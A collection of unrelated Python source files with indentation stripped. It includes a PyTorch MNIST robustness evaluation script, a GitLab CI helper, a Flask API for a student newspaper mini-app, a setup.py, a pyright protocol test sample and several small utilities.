self._assistant = assistant
# Re-register if "device_id" is different from the last "device_id":
if self.should_register or (device_id != self.last_device_id):
if self.project_id:
register_device(self.project_id, self.credentials,
self.device_model_id, device_id)
pathlib.Path(os.path.dirname(self.devconfig_file)).mkdir(exist_ok=True)
with open(self.devconfig_file, 'w') as f:
json.dump({
'last_device_id': device_id,
'model_id': self.device_model_id,
}, f)
else:
LOGGER.error("Device is not registered!")
for event in events:
if self._exit.is_set():
return
self.process_event(event)
|
python
|
import time
# only required to run python3 examples/cvt_arm.py
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
from torchvision import datasets, transforms
from torch.utils.data import Dataset
import os
import math
import numpy as np
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
batch_size = 64 # batch size in every epoch
class CustomDataset(Dataset):
def __init__(self, data, targets, transform=None, target_transform=None):
self.data = data
self.targets = targets
self.transform = transform
self.target_transform = target_transform
def __len__(self):
return len(self.targets)
def __getitem__(self, idx):
img, target = self.data[idx], self.targets[idx]
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
train_dataset = datasets.MNIST(root = 'data/', train=True, download=False,
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
]))
# training set
train_loader = torch.utils.data.DataLoader(train_dataset,
batch_size=batch_size,
shuffle=True,
num_workers=4,
drop_last=True)
test_dataset = datasets.MNIST(root = 'data/', train=False, download=False,
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
]))
# test set
test_loader = torch.utils.data.DataLoader(test_dataset,
batch_size=100,
shuffle=True,
num_workers=4,
drop_last=False)
inv_adv_examples = np.load("invariance_examples/final_l0/inv_adv_examples.npy") # visualize this for sanity check
human_labels = np.load("invariance_examples/final_l0/human_labels.npy")
inv_eg_dataset = CustomDataset(data=inv_adv_examples,
targets=human_labels,
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
]))
inv_eg_dataloader = torch.utils.data.DataLoader(inv_eg_dataset,
batch_size=10,
shuffle=True,
num_workers=4,
drop_last=False)
class MLP(nn.Module):
def __init__(self, input_size=784, output_size=10):
super(MLP, self).__init__()
self.fc1 = nn.Linear(input_size, 20)
self.fc2 = nn.Linear(20, output_size)
def forward(self, x):
x = x.view(-1, 28 * 28)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
return F.log_softmax(x, dim=1)
model = MLP()
model = model.to(device)
epochs = 100
# specify loss function
criterion = nn.CrossEntropyLoss()
# specify optimizer
optimizer = torch.optim.SGD(model.parameters(), lr=0.1)
model.train() # prep model for training
standard_acc_arr = []
robust_acc_arr = []
for epoch in range(epochs):
# monitor training loss
train_loss = 0.0
###################
# train the model #
###################
for data, target in train_loader:
data, target = data.to(device), target.to(device)
# clear the gradients of all optimized variables
optimizer.zero_grad()
# forward pass: compute predicted outputs by passing inputs to the model
output = model(data)
# calculate the loss
loss = criterion(output, target)
# backward pass: compute gradient of the loss with respect to model parameters
loss.backward()
# perform a single optimization step (parameter update)
optimizer.step()
# update running training loss
train_loss += loss.item()*data.size(0)
#--------------------------------------------------------------------------------------
# initialize lists to monitor test loss and accuracy
class_correct = list(0. for i in range(10))
class_total = list(0. for i in range(10))
model.eval() # prep model for *evaluation*
for data, target in test_loader:
data, target = data.to(device), target.to(device)
# forward pass: compute predicted outputs by passing inputs to the model
output = model(data)
# convert output probabilities to predicted class
_, pred = torch.max(output, 1)
# compare predictions to true label
correct = np.squeeze(pred.eq(target.data.view_as(pred)))
# calculate test accuracy for each object class
for i in range(len(target)):
label = target.data[i]
class_correct[label] += correct[i].item()
class_total[label] += 1
test_accuracy = 100. * np.sum(class_correct) / np.sum(class_total)
standard_acc_arr.append(test_accuracy)
print('\n Standard test accuracy: %2d%% (%2d/%2d)' % (test_accuracy,
np.sum(class_correct),
np.sum(class_total)))
#--------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------
# initialize lists to monitor test loss and accuracy
class_correct = list(0. for i in range(10))
class_total = list(0. for i in range(10))
model.eval() # prep model for *evaluation*
for data, target in inv_eg_dataloader:
data, target = data.to(device), target.to(device)
# forward pass: compute predicted outputs by passing inputs to the model
output = model(data)
# convert output probabilities to predicted class
_, pred = torch.max(output, 1)
# compare predictions to true label
correct = np.squeeze(pred.eq(target.data.view_as(pred)))
# calculate test accuracy for each object class
for i in range(len(target)):
label = target.data[i]
class_correct[label] += correct[i].item()
class_total[label] += 1
test_accuracy = 100. * np.sum(class_correct) / np.sum(class_total)
robust_acc_arr.append(test_accuracy)
print('\n Robust test accuracy: %2d%% (%2d/%2d)' % (test_accuracy,
np.sum(class_correct),
np.sum(class_total)))
#--------------------------------------------------------------------------------------
save_path = "saved_stuff/eval_mlp/"
if not os.path.exists(save_path):
os.makedirs(save_path)
torch.save(standard_acc_arr, os.path.join(save_path, "standard_acc_arr.pt"))
torch.save(robust_acc_arr, os.path.join(save_path, "robust_acc_arr.pt"))
|
python
|
import os
import requests
from datetime import datetime, timedelta
import gitlab
class Gitlab():
def __init__(self, api_url, **kwargs):
self.gitlab = gitlab.Gitlab(api_url, **kwargs)
def is_gitlab(self):
if os.environ.get('CI', 'false') == 'true':
return True
else:
return False
def is_pull_request(self):
if self.is_gitlab() and os.environ.get('CI_MERGE_REQUEST_ID', None) is not None:
return True
else:
return False
def branch(self):
if self.is_gitlab():
return os.environ.get('CI_COMMIT_BRANCH')
else:
return 'master'
def commit_hash(self):
return os.environ.get('CI_COMMIT_SHA', '0' * 30)
def short_commit_hash(self):
return os.environ.get('CI_COMMIT_SHA', '0' * 30)[:7]
def tag(self):
return os.environ.get('CI_COMMIT_TAG', None)
def is_tag(self):
if os.environ.get('CI_COMMIT_TAG', False):
return True
else:
return False
def home_dir(self):
return os.environ.get('HOME', '/dev/null')
def build_dir(self):
return os.environ.get('CI_BUILDS_DIR', '/dev/null')
def build_number(self):
prj = self.gitlab.projects.get(os.environ['CI_PROJECT_ID'])
var = None
try:
var = prj.variables.get('BUILD_NUMBER')
except gitlab.exceptions.GitlabGetError as e:
if e.response_code == 404:
prj.variables.create({'key': 'BUILD_NUMBER', 'value': '0'})
var.value = str(int(var.value) + 1)
var.save()
return int(var.value)
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ---------------------------------------
# Project: PKUYouth Webserver v2
# File: __init__.py
# Created Date: 2020-07-28
# Author: Xinghong Zhong
# ---------------------------------------
# Copyright (c) 2020 PKUYouth
import time
import datetime
import calendar
from functools import wraps
from collections import OrderedDict
from pypinyin import lazy_pinyin
from flask import Blueprint, current_app, g, abort
from ...models import db, WxUser, Article, WxUserArticle, Reporter, ArticleReporter
from ...core.flask.parser import get_str_field, get_int_field, get_bool_field
from ...core.redis.types import RedisAutoExpiredMap
from ...core.utils import u, xMD5
from ...core.exceptions import MiniappUnauthorized, RequestArgumentError
from .api import jscode2session
bpMiniapp = Blueprint('miniapp', __name__)
utoken_map = None
UTOKEN_EXPIRES = 3600 * 12
PAGE_SIZE = 8
QINIU_IMAGE_PREFIX = "https://qiniu.rabbitzxh.top/pkuyouth"
APP_CONFIG = {
"prefix": {
"column": QINIU_IMAGE_PREFIX + "/column_cover/",
"sm_cover": QINIU_IMAGE_PREFIX + "/sm_cover/",
"bg_cover": QINIU_IMAGE_PREFIX + "/bg_cover/"
},
"app_info": {
"name": "北大青年",
"version": "2.0.0",
}
}
INDEX_COL_DESC = [
{
"id": 0,
"cover": QINIU_IMAGE_PREFIX + '/bg_cover/26508266021.jpeg',
"title": '随便看看',
"desc": '随意翻翻北青的文章',
"path": '/pages/collection-random/collection-random',
},
{
"id": 1,
"cover": QINIU_IMAGE_PREFIX + '/bg_cover/26508283011.jpeg',
"title": '热文排行',
"desc": '看看那些阅读量最高的文章',
"path": '/pages/collection-hot/collection-hot',
},
{
"id": 2,
"cover": QINIU_IMAGE_PREFIX + '/bg_cover/26508251861.jpeg',
"title": '还有更多',
"desc": '主编们正在努力整理 ...',
"path": '',
}
]
COLUMNS_LIST = OrderedDict({
"调查": "只做好一件事——刨根问底",
"人物": "今天载了位了不得的人物",
"特稿": "不停留在表面",
"视界": "一览众山小",
"光阴": "不忘初心,继续前进",
"姿势": "干货、湿货、杂货,老司机带你涨姿势",
"言己": "说出你的故事",
"又见": "如果在异乡,一个旅人",
"雕龙": "操千曲而后晓声,观千剑而后识器",
"评论": "条条大路,众生喧哗",
"摄影": "我为了把你拍得更漂亮嘛~",
"图说": "边走边看",
"机动": "说走就走,想停就停;可以跑高速,亦可钻胡同",
"现场": "一车载你直达热点",
"对话": "听见你的声音",
"纪念": "为了未来,收藏过去",
"节日": "今天应该很高兴",
"新年献词": "新时代,新青年",
# "翻译": "null",
})
def init_utoken_map():
global utoken_map
if utoken_map is not None:
return
utoken_map = RedisAutoExpiredMap(
namespace=current_app.config['CACHE_KEY_PREFIX'] + "miniapp_utk",
expires=UTOKEN_EXPIRES,
)
def generate_utoken(openid, session_key):
return xMD5("%s:%s:%s" % (openid, session_key, int(time.time() * 1000)))
def get_range(page, size):
page = max(page, 1)
return ((page - 1) * size, page * size)
def verify_utoken(func):
@wraps(func)
def wrapper(*args, **kwargs):
init_utoken_map()
utoken = get_str_field('utoken')
openid = utoken_map[utoken]
if openid is None:
raise MiniappUnauthorized("Invalid utoken")
g.openid = u(openid)
ret = func(*args, **kwargs)
return ret
return wrapper
@bpMiniapp.route('/', methods=["GET","POST"])
def root():
abort(404)
@bpMiniapp.route('/login', methods=["POST"])
def login():
"""
Method POST
JSON:
- js_code str
Return:
- errcode int
- utoken str
- setting dict
- auto_change_card bool
- use_small_card bool
- config dict
"""
init_utoken_map()
js_code = get_str_field('js_code')
openid, session_key = jscode2session(js_code)
utoken = generate_utoken(openid, session_key)
utoken_map[utoken] = openid
user = WxUser.query.get(openid)
if user is None:
user = WxUser(openid)
db.session.add(user)
db.session.commit()
return {
"errcode": 0,
"utoken": utoken,
"setting": {
"auto_change_card": user.auto_change_card,
"use_small_card": user.use_small_card,
},
"config": APP_CONFIG,
}
@bpMiniapp.route('/get_col_desc', methods=["GET"])
@verify_utoken
def get_col_desc():
"""
Method GET
Args:
- utoken str
Return:
- errcode int
- col_desc [dict]
- id int
- cover str
- title str
- desc str
- path str
"""
return {
"errcode": 0,
"col_desc": INDEX_COL_DESC,
}
@bpMiniapp.route('/get_col_random', methods=["GET"])
@verify_utoken
def get_col_random():
"""
Method GET
Args:
- utoken str
Return:
- errcode int
- articles [dict]
"""
openid = g.openid
sbq1 = db.session.\
query(Article.aid).\
filter(Article.hidden == 0).\
order_by(db.func.rand()).\
limit(PAGE_SIZE).\
subquery()
sbq2 = WxUserArticle.query.\
filter(WxUserArticle.openid == openid).\
subquery()
articles = db.session.\
query(
Article.aid,
Article.appmsgid,
Article.idx,
Article.sn,
Article.title,
Article.masssend_time,
Article.cover_url,
Article.read_num,
Article.like_num,
Article.hidden,
sbq2.c.ctime.label('star_time'),
).\
join(sbq1, sbq1.c.aid == Article.aid).\
outerjoin(sbq2, sbq2.c.aid == Article.aid).\
all()
return {
"errcode": 0,
"articles": [ a._asdict() for a in articles ]
}
@bpMiniapp.route('/get_latest_articles', methods=["GET"])
@verify_utoken
def get_latest_articles():
"""
Method GET
Args:
- utoken str
Return:
- errcode int
- articles [dict]
"""
openid = g.openid
sbq = db.session.\
query(Article.aid).\
filter(Article.hidden == 0).\
order_by(Article.masssend_time.desc()).\
limit(PAGE_SIZE).\
subquery()
articles = db.session.\
query(
Article.aid,
Article.appmsgid,
Article.idx,
Article.sn,
Article.title,
Article.read_num,
Article.like_num,
Article.masssend_time,
Article.cover_url
).\
join(sbq, sbq.c.aid == Article.aid).\
order_by(
Article.masssend_time.desc(),
Article.idx.asc(),
).\
all()
return {
"errcode": 0,
"articles": [ a._asdict() for a in articles ]
}
@bpMiniapp.route('/get_col_hot', methods=["GET"])
@verify_utoken
def get_col_hot():
"""
Method GET
Args:
- utoken str
- page int
Return:
- errcode int
- articles [dict]
"""
openid = g.openid
page = get_int_field('page')
st, ed = get_range(page, PAGE_SIZE)
sbq1 = db.session.\
query(Article.aid).\
filter(Article.hidden == 0).\
order_by(
Article.read_num.desc(),
Article.masssend_time.desc(),
Article.idx.asc(),
).\
slice(st, ed).\
subquery()
sbq2 = WxUserArticle.query.\
filter(WxUserArticle.openid == openid).\
subquery()
articles = db.session.\
query(
Article.aid,
Article.appmsgid,
Article.idx,
Article.sn,
Article.title,
Article.masssend_time,
Article.cover_url,
Article.read_num,
Article.like_num,
Article.hidden,
sbq2.c.ctime.label('star_time'),
).\
join(sbq1, sbq1.c.aid == Article.aid).\
outerjoin(sbq2, sbq2.c.aid == Article.aid).\
order_by(
Article.read_num.desc(),
Article.masssend_time.desc(),
Article.idx.asc(),
).\
all()
return {
"errcode": 0,
"articles": [ a._asdict() for a in articles ]
}
@bpMiniapp.route('/get_column_list', methods=["GET"])
@verify_utoken
def get_column_list():
"""
Method GET
Args:
- utoken str
Return:
- errcode int
- columns [dict]
- id int
- title str
- desc str
- cover str
- article_count int
"""
columns = list(COLUMNS_LIST.keys())
rlist = db.session.\
query(
Article.column,
db.func.count(Article.aid).label('count'),
).\
filter(Article.hidden == 0).\
filter(Article.column.in_(columns)).\
group_by(Article.column).\
all()
counter = { r.column: r.count for r in rlist }
return {
"errcode": 0,
"columns": [
{
"id": ix,
"title": title,
"desc": desc,
"cover": "%s.jpg" % ''.join(lazy_pinyin(title)),
"article_count": counter.get(title, 0),
}
for ix, (title, desc) in enumerate(COLUMNS_LIST.items())
],
}
@bpMiniapp.route('/get_column_articles', methods=["GET"])
@verify_utoken
def get_column_articles():
"""
Method GET
Args:
- utoken str
- column str
- page int if page == 0, return all articles in this column
Return:
- errcode int
- articles [dict]
"""
openid = g.openid
column = get_str_field('column', limited=COLUMNS_LIST)
page = get_int_field('page')
sbq1 = db.session.\
query(Article.aid).\
filter(Article.hidden == 0).\
filter(Article.column == column).\
order_by(
Article.masssend_time.desc(),
Article.idx.asc(),
)
if page != 0:
st, ed = get_range(page, PAGE_SIZE)
sbq1 = sbq1.slice(st, ed)
sbq1 = sbq1.subquery()
sbq2 = WxUserArticle.query.\
filter(WxUserArticle.openid == openid).\
subquery()
articles = db.session.\
query(
Article.aid,
Article.appmsgid,
Article.idx,
Article.sn,
Article.title,
Article.masssend_time,
Article.cover_url,
Article.read_num,
Article.like_num,
Article.hidden,
sbq2.c.ctime.label('star_time'),
).\
join(sbq1, sbq1.c.aid == Article.aid).\
outerjoin(sbq2, sbq2.c.aid == Article.aid).\
order_by(
Article.masssend_time.desc(),
Article.idx.asc(),
).\
all()
return {
"errcode": 0,
"articles": [ a._asdict() for a in articles ]
}
@bpMiniapp.route('/get_date_range', methods=["GET"])
@verify_utoken
def get_date_range():
"""
Method GET
Args:
- utoken str
"""
rlist = db.session.\
query(
db.func.min(Article.masssend_time),
db.func.max(Article.masssend_time)
).\
first()
st, ed = map(lambda t: time.strftime("%Y-%m-%d", time.localtime(t)), rlist)
return {
"errcode": 0,
"range": {
"start": st,
"end": ed,
}
}
@bpMiniapp.route('/search_reporters', methods=["GET"])
@verify_utoken
def search_reporters():
"""
Method GET
Args:
- utoken str
- keyword str
Return:
- errcode int
- reporters [dict]
- name str
- articles [int]
"""
keyword = get_str_field("keyword")
names = [ name.strip() for name in keyword.split() if len(name.strip()) > 0 ]
sbq = db.session.\
query(Article.aid).\
filter(Article.hidden == 0).\
subquery()
reporters = db.session.\
query(
Reporter.name,
db.func.count(sbq.c.aid).label('article_count'),
).\
join(ArticleReporter, ArticleReporter.rid == Reporter.rid).\
join(sbq, sbq.c.aid == ArticleReporter.aid).\
filter(Reporter.name.in_(names)).\
group_by(Reporter.rid).\
order_by(db.desc('article_count')).\
all()
return {
"errcode": 0,
"reporters": [ r._asdict() for r in reporters ],
}
@bpMiniapp.route('/get_reporter_articles', methods=["GET"])
@verify_utoken
def get_reporter_articles():
"""
Method GET
Args:
- utoken str
- name str
- page int if page == 0, return all articles in this column
Return:
- errcode int
- articles [dict]
"""
openid = g.openid
name = get_str_field('name')
page = get_int_field('page')
sbq1 = db.session.\
query(Article.aid).\
join(ArticleReporter, ArticleReporter.aid == Article.aid).\
join(Reporter, Reporter.rid == ArticleReporter.rid).\
filter(Reporter.name == name).\
filter(Article.hidden == 0).\
order_by(
Article.masssend_time.desc(),
Article.idx.asc(),
)
if page != 0:
st, ed = get_range(page, PAGE_SIZE)
sbq1 = sbq1.slice(st, ed)
sbq1 = sbq1.subquery()
sbq2 = WxUserArticle.query.\
filter(WxUserArticle.openid == openid).\
subquery()
articles = db.session.\
query(
Article.aid,
Article.appmsgid,
Article.idx,
Article.sn,
Article.title,
Article.masssend_time,
Article.cover_url,
Article.read_num,
Article.like_num,
Article.hidden,
sbq2.c.ctime.label('star_time'),
).\
join(sbq1, sbq1.c.aid == Article.aid).\
outerjoin(sbq2, sbq2.c.aid == Article.aid).\
order_by(
Article.masssend_time.desc(),
Article.idx.asc(),
).\
all()
return {
"errcode": 0,
"articles": [ a._asdict() for a in articles ],
}
@bpMiniapp.route('/search_articles_by_date', methods=["GET"])
@verify_utoken
def search_articles_by_date():
"""
Method GET
Args:
- utoken str
- date str
- level str options: ('month','day')
Return:
- errcode int
- articles [dict]
"""
openid = g.openid
date = get_str_field('date')
level = get_str_field('level', limited=['month','day'])
try:
dt = datetime.datetime.strptime(date, '%Y-%m-%d')
except ValueError as e:
raise RequestArgumentError("Invalid date %s" % date)
if level == 'month':
st = datetime.datetime(dt.year, dt.month, 1)
span = calendar.monthrange(dt.year, dt.month)[1]
else:
st = dt
span = 1
ed = st + datetime.timedelta(span)
st, ed = map(lambda dt: int(dt.timestamp()), [st, ed])
sbq1 = db.session.\
query(Article.aid).\
filter(Article.hidden == 0).\
filter(Article.masssend_time.between(st, ed)).\
order_by(
Article.masssend_time.desc(),
Article.idx.asc(),
).\
subquery()
sbq2 = WxUserArticle.query.\
filter(WxUserArticle.openid == openid).\
subquery()
articles = db.session.\
query(
Article.aid,
Article.appmsgid,
Article.idx,
Article.sn,
Article.title,
Article.masssend_time,
Article.cover_url,
Article.read_num,
Article.like_num,
Article.hidden,
sbq2.c.ctime.label('star_time'),
).\
join(sbq1, sbq1.c.aid == Article.aid).\
outerjoin(sbq2, sbq2.c.aid == Article.aid).\
order_by(
Article.masssend_time.desc(),
Article.idx.asc(),
).\
all()
return {
"errcode": 0,
"articles": [ a._asdict() for a in articles ],
}
@bpMiniapp.route('/search_articles_by_keyword', methods=["GET"])
@verify_utoken
def search_articles_by_keyword():
"""
Method GET
Args:
- utoken str
- keyword str
- filter str options: ('all','favorite')/column/reporter
- page int
Return:
- errcode int
- articles [dict]
"""
openid = g.openid
keyword = get_str_field('keyword')
ft = get_str_field('filter')
page = get_int_field('page')
st, ed = get_range(page, PAGE_SIZE)
sbq1 = db.session.\
query(
Article.aid,
db.fts_match(
Article.ix_text,
keyword,
db.fts_match.BOOLEAN
).label('score')
)
if ft == 'all':
pass
elif ft == 'favorite':
sbq1 = sbq1.\
join(WxUserArticle).\
filter(WxUserArticle.openid == openid)
elif ft in COLUMNS_LIST:
sbq1 = sbq1.\
filter(Article.column == ft)
else:
sbq1 = sbq1.\
join(ArticleReporter, ArticleReporter.aid == Article.aid).\
join(Reporter, Reporter.rid == ArticleReporter.rid).\
filter(Reporter.name == ft)
sbq1 = sbq1.\
filter(Article.hidden == 0).\
order_by(
db.desc('score'),
Article.masssend_time.desc(),
Article.idx.asc(),
).\
slice(st, ed).\
subquery()
sbq2 = WxUserArticle.query.\
filter(WxUserArticle.openid == openid).\
subquery()
articles = db.session.\
query(
Article.aid,
Article.appmsgid,
Article.idx,
Article.sn,
Article.title,
Article.masssend_time,
Article.cover_url,
Article.read_num,
Article.like_num,
Article.hidden,
sbq2.c.ctime.label('star_time'),
).\
join(sbq1, sbq1.c.aid == Article.aid).\
outerjoin(sbq2, sbq2.c.aid == Article.aid).\
order_by(
sbq1.c.score.desc(),
Article.masssend_time.desc(),
Article.idx.asc(),
).\
all()
return {
"errcode": 0,
"articles": [ a._asdict() for a in articles ]
}
@bpMiniapp.route('/get_starred_articles', methods=["GET"])
@verify_utoken
def get_starred_articles():
"""
Method GET
Args:
- utoken str
- page int
"""
openid = g.openid
page = get_int_field('page')
sbq = db.session.\
query(
Article.aid,
WxUserArticle.ctime,
).\
join(WxUserArticle).\
filter(WxUserArticle.openid == openid).\
filter(Article.hidden == 0).\
order_by(WxUserArticle.ctime.desc())
if page != 0:
st, ed = get_range(page, PAGE_SIZE)
sbq = sbq.slice(st, ed)
sbq = sbq.subquery()
articles = db.session.\
query(
Article.aid,
Article.appmsgid,
Article.idx,
Article.sn,
Article.title,
Article.masssend_time,
Article.cover_url,
Article.read_num,
Article.like_num,
Article.hidden,
sbq.c.ctime.label('star_time'),
).\
join(sbq, sbq.c.aid == Article.aid).\
order_by(db.desc('star_time')).\
all()
return {
"errcode": 0,
"articles": [ a._asdict() for a in articles ]
}
@bpMiniapp.route('/star_article', methods=["POST"])
@verify_utoken
def star_article():
"""
Method POST
JSON:
- utoken str
- aid int
- action str options: ('star','unstar')
Return:
- errcode int
"""
openid = g.openid
aid = get_int_field('aid')
action = get_str_field('action', limited=['star','unstar'])
ret = db.session.\
query(Article.aid).\
filter(Article.hidden == 0).\
filter(Article.aid == aid).\
first()
if ret is None:
raise RequestArgumentError("Article %d was not found" % aid)
ua = WxUserArticle.query.\
filter(WxUserArticle.aid == aid).\
filter(WxUserArticle.openid == openid).\
first()
if action == 'star' and ua is None:
ua = WxUserArticle(openid, aid)
db.session.add(ua)
db.session.commit()
if action == 'unstar' and ua is not None:
db.session.delete(ua)
db.session.commit()
return {
"errcode": 0
}
@bpMiniapp.route('/change_setting', methods=["POST"])
@verify_utoken
def change_setting():
"""
Method POST
JSON:
- utoken str
- key str
- value bool
Return:
- errcode int
"""
openid = g.openid
key = get_str_field('key')
value = get_bool_field('value')
user = WxUser.query.get(openid)
if key == 'auto_change_card':
user.auto_change_card = value
elif key == 'use_small_card':
user.use_small_card = value
else:
raise RequestArgumentError("Invalid setting key %s" % key)
db.session.commit()
return {
"errcode": 0
}
|
python
|
import os
import re
import sys
import codecs
from setuptools import setup, find_packages, Command
from setuptools.command.test import test as TestCommand
here = os.path.abspath(os.path.dirname(__file__))
setup_requires = ['pytest', 'tox']
install_requires = ['six', 'tox', 'atomos']
tests_require = ['six', 'pytest-cov', 'pytest-cache', 'pytest-timeout']
dev_requires = ['pyflakes', 'pep8', 'pylint', 'check-manifest',
'ipython', 'ipdb', 'sphinx', 'sphinx_rtd_theme',
'sphinxcontrib-napoleon']
dev_requires.append(tests_require)
PY2 = sys.version_info.major is 2
PY3 = sys.version_info.major is 3
if PY2:
install_requires.append('futures')
install_requires.append('enum34')
if PY3:
install_requires.append('enum34')
version = "0.0.0"
changes = os.path.join(here, "CHANGES.md")
match = '^#*\s*(?P<version>[0-9]+\.[0-9]+(\.[0-9]+)?)$'
with codecs.open(changes, encoding='utf-8') as changes:
for line in changes:
match = re.match(match, line)
if match:
version = match.group("version")
break
# Get the long description
with codecs.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
# Get version
with codecs.open(os.path.join(here, 'CHANGES.md'), encoding='utf-8') as f:
changelog = f.read()
class VersionCommand(Command):
description = "print library version"
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
print(version)
class PyTest(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = ['--strict', '--verbose', '--tb=long',
'--cov', 'hystrix', '--cov-report',
'term-missing', 'tests']
self.test_suite = True
def run_tests(self):
import pytest
errno = pytest.main(self.test_args)
sys.exit(errno)
class Tox(TestCommand):
user_options = [('tox-args=', 'a', "Arguments to pass to tox")]
def initialize_options(self):
TestCommand.initialize_options(self)
self.tox_args = None
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
# import here, cause outside the eggs aren't loaded
import tox
import shlex
args = self.tox_args
if args:
args = shlex.split(self.tox_args)
errno = tox.cmdline(args=args)
sys.exit(errno)
setup(
name='hystrix-py',
version='0.1.0',
description='A Netflix Hystrix implementation in Python',
long_description=long_description,
url='https://github.com/wiliamsouza/hystrix-py',
author='The Hystrix Python Authors',
author_email='[email protected]',
license='Apache Software License 2.0',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development :: Library',
'License :: OSI Approved :: Apache Software License 2.0',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
keywords='sample setuptools development',
packages=find_packages(exclude=['docs', 'tests']),
setup_requires=setup_requires,
install_requires=install_requires,
tests_require=tests_require,
extras_require={
'dev': dev_requires,
'test': tests_require,
},
cmdclass={
"version": VersionCommand,
'test': PyTest,
"tox": Tox,
},
)
|
python
|
# Unsere Funktion nimmt eine Liste als Parameter
def find_nouns(list_of_words):
nouns = list()
# Das erste Wort ist wahrscheinlich großgeschrieben, fällt aber aus unserer Definition raus
for i in range(1, len(list_of_words)):
current_word = list_of_words[i]
if current_word[0].isupper():
# list_of_words[i-1]: Das vorherige Wort
if not list_of_words[i-1].endswith("."):
nouns.append(current_word)
return nouns
with open("hase_igel.txt") as f:
story = f.read()
words = story.split()
nouns = find_nouns(words)
with open("hase_igel_nouns.txt", "w") as result:
for noun in nouns:
result.write(noun + ", ")
|
python
|
from app import app
from flask import Blueprint, render_template
@app.errorhandler(404)
def not_found_error():
return render_template('errors/404.html'), 404
@app.errorhandler(500)
def internal_error(error):
return render_template('errors/500.html'), 500
|
python
|
import glob
import numpy as np
import sys
import argparse
def main():
parser = argparse.ArgumentParser(description="Produce report from result files")
parser.add_argument('--path', type=str, default="",
help="Path to the result files (* will be appended)")
args = parser.parse_args()
test_accuracies = []
train_accuracies = []
train_losses = []
for f in glob.glob(args.path+"*"):
with open(f) as ff:
loss, train_acc, test_acc = map(float, ff.readline().split())
test_accuracies.append(test_acc)
train_accuracies.append(train_acc)
train_losses.append(loss)
print("Test: {:.4f} ± {:.4f}".format(np.mean(test_accuracies),\
np.std(test_accuracies)))
print("Train: {:.4f} ± {:.4f}".format(np.mean(train_accuracies),\
np.std(train_accuracies)))
print("Loss: {:.4f} ± {:.4f}".format(np.mean(loss),\
np.std(loss)))
if __name__ == "__main__":
main()
|
python
|
# This sample tests the case where a protocol class derives from
# another protocol class.
from typing import Generic, TypeVar, Protocol
Arg = TypeVar("Arg", contravariant=True)
Value = TypeVar("Value")
class Base1(Protocol[Value]):
def method1(self, default: Value) -> Value:
...
class Base2(Base1[Value], Protocol):
def method2(self, default: Value) -> Value:
...
class Interface(Base2[Value], Protocol[Arg, Value]):
def another(self, arg: Arg) -> None:
...
class Implementation1(Generic[Arg, Value]):
def method1(self, default: Value) -> Value:
return default
def method2(self, default: Value) -> Value:
return default
def another(self, arg: Arg) -> None:
return
def func1(arg: Arg, value: Value) -> Interface[Arg, Value]:
return Implementation1[Arg, Value]()
class Implementation2(Generic[Arg, Value]):
def method1(self, default: Value) -> Value:
return default
def another(self, arg: Arg) -> None:
return
def func2(arg: Arg, value: Value) -> Interface[Arg, Value]:
# This should generate an error because
# Implementation2 doesn't implement method2.
return Implementation2[Arg, Value]()
class Implementation3(Generic[Arg, Value]):
def method1(self, default: int) -> int:
return default
def method2(self, default: Value) -> Value:
return default
def another(self, arg: Arg) -> None:
return
def func3(arg: Arg, value: Value) -> Interface[Arg, Value]:
# This should generate an error because
# Implementation3's signature doesn't match.
return Implementation3[Arg, Value]()
|
python
|
import collections
from supriya import CalculationRate
from supriya.synthdefs import WidthFirstUGen
class ClearBuf(WidthFirstUGen):
"""
::
>>> clear_buf = supriya.ugens.ClearBuf.ir(
... buffer_id=23,
... )
>>> clear_buf
ClearBuf.ir()
"""
### CLASS VARIABLES ###
__documentation_section__ = "Buffer UGens"
_ordered_input_names = collections.OrderedDict([("buffer_id", None)])
_valid_calculation_rates = (CalculationRate.SCALAR,)
|
python
|
from collections import OrderedDict
from itertools import takewhile
from dht.utils import last
class Cluster(object):
def __init__(self, members):
self.hash = hash
self.members = OrderedDict(((self.hash(node), node) for node in members))
def __len__(self):
return sum((len(node) for node in self.members.values()))
def __getitem__(self, key):
return self.location(key)[key]
def __setitem__(self, key, value):
self.location(key)[key] = value
def __delitem__(self, key):
del self.location(key)[key]
def location(self, key):
"""
Returns where a given key should be stored.
"""
hashed = self.hash(key)
try:
return last(takewhile(lambda pair: pair[0] <= hashed,
self.members.items()))[1]
except ValueError:
# "wrap around" the ring of nodes to the last node if no nodes
# have a hashed value that is lower than or equal to the hashed
# value of the key
return self.members.values()[-1]
|
python
|
from typing import Optional
from pydantic import BaseSettings, Json
from ._version import version as __version__ # NOQA
class Settings(BaseSettings):
auth_token_url: str = "https://solarperformanceinsight.us.auth0.com/oauth/token"
auth_jwk_url: str = (
"https://solarperformanceinsight.us.auth0.com/.well-known/jwks.json"
)
auth_key: Json
auth_audience: str = "https://app.solarperformanceinsight.org/api"
auth_issuer: str = "https://solarperformanceinsight.us.auth0.com/"
auth_client_id: str = "G1YyfLdseYn10RQo11Lqee2ThXj5l5fh"
traces_sample_rate: Optional[float] = None
class Config:
env_prefix = "spi"
settings = Settings()
|
python
|
from rest_framework import viewsets, status
from rest_framework.response import Response
from rest_framework.decorators import action
from backend.api.models import MiembroSprint, Usuario, Rol
from backend.api.serializers import UsuarioSerializer
class UsuarioViewSet(viewsets.ViewSet):
"""
UsuarioViewSet View para el modelo Usuario
Args:
viewsets (module): tipo de clase basado en view
"""
